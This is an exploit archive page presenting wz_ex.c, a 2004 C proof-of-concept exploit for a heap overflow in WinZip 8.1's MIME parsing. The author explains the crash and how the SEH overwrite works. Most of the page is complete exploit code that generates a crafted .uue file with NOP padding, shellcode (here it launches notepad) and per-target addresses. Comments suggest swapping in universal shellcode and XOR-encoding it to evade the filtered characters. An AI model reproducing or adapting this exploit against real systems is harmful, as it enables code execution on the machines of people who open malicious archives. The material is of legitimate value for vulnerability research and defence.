exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

wz_ex.c

wz_ex.c
Posted Apr 15, 2004
Authored by snooq | Site angelfire.com

Proof of concept exploit for the WinZip32 MIME Parsing Overflow. Tested against WinZip 8.1 on Windows XP SP1 and Windows 2000 SP1. Instructions for use are included.

tags | exploit, overflow, proof of concept
systems | windows
SHA-256 | 8a7e5cb801e4ff9423fec6d0c994638590a6f7103e548f3888181d78cc1db3c2

wz_ex.c

Change Mirror Download
/*
* Author: snooq [http://www.angelfire.com/linux/snooq/]
* Date: 14 April 2004
*
* This is a PoC exploit for WinZip32 MIME Parsing Overflow
* bug reported by iDefense on 27 February 2004.
*
* The original advisory is found here:
* http://www.idefense.com/application/poi/display?id=76
*
* This version is SP dependent becoz my idiotic shellcode
* uses hardcoded addresses.... =p
*
* So, test it locally only. Afterall, it's just a PoC rite?
* Nonetheless, it's possible to make it more portable by
* using a universal shellcode...
*
* but beware... chars like <>,.:;'"=[]\/ are filtered...
* so feel free to XOR it.. =p
*
* Notes
* =====
* 1) Tested against WinZip 8.1 on WinXP SP1, Win2K SP1 only
*
* 2) You need to first launch WinZip before you 'Open'
*
* 3) Double clicking the 'uue' won't work
* why so? go figure it out urself... =p
* once u know why... u'd then know how to fix it...
*
* Greetz
* ======
* # eugene, nam, jf, valmont and the rest..
* # sk, shashank + Security_Auditors folks...
* # iDefense folks... SiG^2 guys etc...
* # lastly.. Greg Hoglund for his 'Cross Page' stuffs... =p
*/

/*
* A snapshot of the 'crash'
* =========================
*
* Our buffer on the heap looks like this:
*
* [....AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEEEEEEEEEEEEEEE....]
* |--- heap grows this way --------->
*
*
* and the CPU is about to execute the following code:
*
* 0049BFFC |> 8B4C13 08 MOV ECX,DWORD PTR DS:[EBX+EDX+8]
* 0049C000 |. 8B7C13 04 MOV EDI,DWORD PTR DS:[EBX+EDX+4]
* 0049C004 |. 8979 04 MOV DWORD PTR DS:[ECX+4],EDI
* 0049C007 |. 8B4C13 04 MOV ECX,DWORD PTR DS:[EBX+EDX+4]
* 0049C00B |. 8B7C13 08 MOV EDI,DWORD PTR DS:[EBX+EDX+8]
* 0049C00F |. 035D F8 ADD EBX,DWORD PTR SS:[EBP-8]
* 0049C012 |. 8979 08 MOV DWORD PTR DS:[ECX+8],EDI
* 0049C015 |. 895D F4 MOV DWORD PTR SS:[EBP-C],EBX
*
* and, EBX register seems to be under our control... =p
*
* EDX = ptr to 'DDDD'
* EBX = 'DDDD' - 1
*
* By carefully choosing a value for EBX, we are able to manipulate
* ECX at 0049BFFC and EDI at 0049C000.
*
* If we set 'DDDD'=0xfffffff5 (-11),
*
* -> EBX would be '0xfffffff4' (-12)
* -> [EBX+EDX+8] becomes [EDX-4] and ECX = 'CCCC'
* -> [EBX+EDX+4] becomes [EDX-8] and EDI = 'BBBB'
*
* Effectively at 0049C004, we can write a DWORD 'BBBB' to ['CCCC'+4]
* After that.....
*
* -> [EBX+EDX+4] becomes [EDX-8] and ECX = 'BBBB'
* -> [EBX+EDX+8] becomes [EDX-4] and EDI = 'CCCC'
*
* Finally we reach MOV DWORD PTR DS:['BBBB'+8],'CCCC' at 0049C012..
*
* Choosing the rite values for 'BBBB' + 'CCCC', execution flow could
* be reliably diverted into our shellcode.
*
* In this exploit, I've chosen to install our code as the main thread's
* top exception handler so that when exception is triggered at 0049C012,
* our code will be called to 'handle' it... =p
*
* This is how I did it but I'm not sure if this is the best way.
* If you know of any other better way to exploit this.....
* pleaseeeeee tell me....... :)
*
*/

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

#define TARGET 1
#define NOP 0x90

/*
* Gap for NOPs (not really needed)
*/
#define PAD 0

/*
* This 'RANGE' nonsense was useful
* in locating the 'index', i.e. 'DDDD'
*/
#define RANGE 1*4

/*
* Where we control the 'index',
* i.e EBX register's value
*/
#define IDXOFF 268-RANGE+4

/*
* We find our 'where' + 'what' here...
*/
#define OFFSET IDXOFF-8

/*
* -12 bytes from 'index' into where
* 'where'+'what' are...
*/
#define INDEX 0xfffffff5

#define BSIZE 1024
#define FNAME "snooq.uue"
#define SSIZE sizeof(shellcode)-1
#define HSIZE sizeof(header)-1

char buff[BSIZE];
long where, what;

struct {
char *os;
long topSEH;
long jmpADD;
}

targets[] = {
{
"Window XP (en) SP1",
0x7ffddffe, // Per Thread Top SEH - 2
0xf27cffff // [this address + 4] -> shellcode
},
{
"Window 2000 (en) SP1",
0x7ffddffe, // Per Thread Top SEH - 2
0xf354ffff // [this address + 4] -> shellcode
},
}, v;

/*
* Harmless payload that spawns 'notepad.exe'... =p
*/

char shellcode[]=
"\x55" // push ebp
"\x8b\xec" // mov ebp, esp
"\x33\xf6" // xor esi, esi
"\x56" // push esi
"\x68\x2e\x65\x78\x65" // push 'exe.'
"\x68\x65\x70\x61\x64" // push 'dape'
"\x68\x90\x6e\x6f\x74" // push 'ton'
"\x46" // inc esi
"\x56" // push esi
"\x8d\x7d\xf1" // lea edi, [ebp-0xf]
"\x57" // push edi
"\xb8XXXX" // mov eax, XXXX -> WinExec()
"\xff\xd0" // call eax
"\x4e" // dec esi
"\x56" // push esi
"\xb8YYYY" // mov eax, YYYY -> ExitProcess()
"\xff\xd0"; // call eax

char header[]="Content-Type: multipart/mixed; boundary=";

void err_exit(char *s)
{
printf("%s\n",s);
exit(0);
}

void filladdr()
{
char *ptr;
int i=0, index=INDEX, idxoff=IDXOFF;

long addr1=(long)WinExec;
long addr2=(long)ExitProcess;

printf("-> WinExec() is at: 0x%08x\n",addr1);
printf("-> ExitProcess() is at: 0x%08x\n",addr2);

ptr=shellcode;

while (*ptr!='\0') {
if (*((long *)ptr)==0x58585858) {
printf("-> Filling in WinExec at offset: %d\n",(ptr-shellcode));
*((long *)ptr)=addr1;
}
if (*((long *)ptr)==0x59595959) {
printf("-> Filling in ExitProcess at offset: %d\n",(ptr-shellcode));
*((long *)ptr)=addr2;
}
ptr++;
}

ptr=buff+HSIZE+OFFSET;
printf("-> 'what' == 0x%08x at offset %d\n",what,OFFSET);
*((long *)ptr)=what;

ptr+=4;
printf("-> 'where' == 0x%08x at offset %d\n",where,OFFSET+4);
*((long *)ptr)=where-4;

ptr=buff+HSIZE+idxoff;

for (;i<RANGE;i+=4) {
printf("-> 'index' == 0x%08x at offset %d\n",index-i,idxoff+i);
*((long *)(ptr+i))=index-i;
}

}

void buildfile()
{
int i=0;

FILE *fd;

if ((fd=fopen(FNAME,"w"))==NULL) {
err_exit("-> Failed to generate file...");
}

for(;i<sizeof(buff);) {
fprintf(fd,"%c",buff[i++]);
}

fclose(fd);

printf("-> '%s' generated....\n",FNAME);

}

int main(int argc, char *argv[])
{
int i=0, t=TARGET;

if (argc==2) { t=atoi(argv[1]); }

where=targets[t-1].topSEH;
what=targets[t-1].jmpADD;

printf("\nWinZip32 MIME Parsing Overflow PoC, By Snooq [jinyean@hotmail.com]\n\n");

memset(buff,NOP,BSIZE);
printf("-> Generating 'uue' file for target #%d...\n",t);
memcpy(buff,header,HSIZE);
filladdr();
memcpy(buff+HSIZE+IDXOFF+4+PAD,shellcode,SSIZE);
buildfile();

return 0;

}





Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close